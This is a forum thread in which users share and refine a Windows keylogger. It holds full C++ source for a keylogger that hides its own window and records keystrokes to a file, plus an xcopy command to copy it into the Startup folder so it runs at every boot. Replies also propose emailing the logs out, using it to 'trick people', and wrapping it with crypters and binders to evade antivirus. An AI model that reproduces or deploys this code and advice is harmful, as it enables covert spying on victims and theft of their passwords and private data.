Keyloggers

-.- [BooCracker1]
11 years ago

0

I am using desktopshark but somehow I dont like it. Suggestions??

31replies
14voices
274views
EEEEE
11 years ago

0

yeah i want a keylogger for me too if u find a good one pm me :)

[HUNON]
11 years ago

0

@EEEEE
Actually you can create your own with a python Shell,
Just download python for windows/ or macosx

EEEEE
11 years ago

0

i already made one with python but its not a professional keylogger


0

you can create keylogger using notepad ++ with c++ languange .
heres the code
```#include
using namespace std;

include <windows.h>

include <winuser.h>

int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
unsigned char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,“LOG.txt”);
}
}
cin.get();
return 0;
}

/ ********************************* /

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]”);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%s”, “ ”);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%s”, “[TAB]”);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%s”, “[SHIFT]”);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%s”, “[CONTROL]”);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]”);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%s”, “[END]”);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%s”, “[HOME]”);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%s”, “[LEFT]”);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%s”, “[UP]”);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%s”, “[RIGHT]”);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%s”, “[DOWN]”);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%s”, “.”);
else
fprintf(OUTPUT_FILE, “%s”, &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/ ********************************* /

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}```
already try it and it really works


0

oh and also credit to breaksecurity.com , i found it when i was reading some article

EEEEE
11 years ago

0

humm thanks i’ll try it

[deleted user]
11 years ago

0

after coping this code to notepad in with file type it should b saved *.exe???
i tryed it n saved as exe but didn’t run.

CygnusH33L
11 years ago

0

You’ll need to compile it first :) Tutorial

[deleted user]
11 years ago

0

tryed it using CodeBlock but gave me an error that someting is not declared…

J [ColdIV]
11 years ago

0

Yeah you will have to add
#include <stdio.h>
should work then.. and I wouldn’t use Code::Blocks..
I prefer this: http://www.wikihow.com/Install-MinGW-%28Minimalist-Gnu-C/C%2B%2B-Compiler%29-on-Microsoft-Windows
(Tutorial how to install everything)

[deleted user]
11 years ago

0

i’ll gave it a try but its late now or i should say its morning here 05 00 Am so am sleeping now…


0

save as exe ? why must save as exe . oh my bad it is Dev C++ download here just press ctrl+ f9 or compile the file then ok . the file will automatically will be a executable file . sorry for the mistake

KingOfSwarm
11 years ago

0

i compile it and my anti-virus says Trojan :)


0

what do you expect ? this is keylogger dude -_- hurm…

J [ColdIV]
11 years ago

0

Well I’d still prefer Code::Blocks to DevC++ but MinGW beats both. (My opinion)

What anti-virus do you use? I guess you can allow the program to start.. You can check the source code, it just checks what key is pressed and writes it in the textfile “LOG.txt”..


0

but must click it every time want to run it after reboot . hurm…. @coldiv have any suggestion for the program to run automatically ?

KingOfSwarm
11 years ago | edited 11 years ago

0

Nod32 version 5
yes yes i see it
it is good keylogger

J [ColdIV]
11 years ago | edited 11 years ago

0

Copy it to auto-start? Shouldn’t be that hard.
(Win+R -> cmd -> type in the following command)
xcopy keylogger.exe %userprofile%\STARTM~1\Programs\Startup\keylogger.exe

But who would want this on his own PC to run all the time?

EEEEE
11 years ago

0

humm thanks :) i’ll try this keylogger


0

hahaha just for fun or trick people :)

Gninja
11 years ago

0

C++ all the way

oxide
11 years ago

0

ya it works add email to it make it a class and add at startup very easy and would work c++ kicks ass c# is super easy

oxide
11 years ago

0

ya it works add email to it make it a class and add at startup very easy and would work c++ kicks ass c# is super easy

Gninja
11 years ago

0

jack up a meterpreter prompt and keylog in real time :D

[IAmDevil]
11 years ago

0

yup Gninja I tried that !!!
Soooo good !!!

? [djsimon21]
11 years ago

0

Nice bit of code there :)

lodovico65
11 years ago

0

The problem is not achieving the keylogger but make it invisible to antivirus. For this reason, it is important to ensure that the keylogger will become FUD (Fully Undetectable) using a combination of tools such as Crypter and Binder.

[IAmDevil]
11 years ago

0

Reaveler Keylogger is also good anyone tried that ???

lodovico65
11 years ago

0

For example, the files obtained with Simple Binder are immediately detected by the antivirus McAfee as “Generic Dropper.ji” trojan and instantly removed. Get a true FUD need great skill. Happy hacking!

oxide
11 years ago

0

actually thats where i have seen people making mistakes you do not need a crypter if you know how to code it will be fud and second of all if you use a deobfuscator it will change all of it so it cant be detected

DaGr8Kornolio
11 years ago

0

@oxide : Tell us how you do it.

Thanks.

You must be logged in to reply to this discussion. Login
1 of 32

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss